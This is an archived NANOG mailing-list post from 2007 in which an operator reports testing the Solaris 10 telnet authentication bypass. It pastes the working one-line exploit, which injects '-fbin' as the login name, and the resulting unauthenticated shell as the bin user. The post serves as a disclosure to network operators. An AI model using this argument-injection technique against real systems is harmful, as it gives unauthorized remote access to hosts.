nanog mailing list archives

Solaris 10 Telnet Exploit

From: William Schultz <wschultz () bsdboy com>
Date: Sun, 11 Feb 2007 19:30:27 -0800

http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html


Tested on Sol10, and it indeed works... Good thing we use SSH, right?!

################################
iWil:~ wschultz$ telnet -l "-fbin" dns1
Trying A.B.C.D...
Connected to dns1.my.com.
Escape character is '^]'.
Last login: Sun Feb 11 18:11:05 from A.B.C.D
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
################################

Current thread:

Solaris 10 Telnet Exploit William Schultz (Feb 11)
- Re: Solaris 10 Telnet Exploit Gadi Evron (Feb 11)
- Re: Solaris 10 Telnet Exploit Gadi Evron (Feb 11)
- Solaris telnet vuln solutions digest and network risks Gadi Evron (Feb 13)
  - Re: Solaris telnet vuln solutions digest and network risks Albert Meyer (Feb 13)
    - Re: Solaris telnet vuln solutions digest and network risks Gadi Evron (Feb 13)
  - Re: Solaris telnet vuln solutions digest and network risks Joseph S D Yao (Feb 15)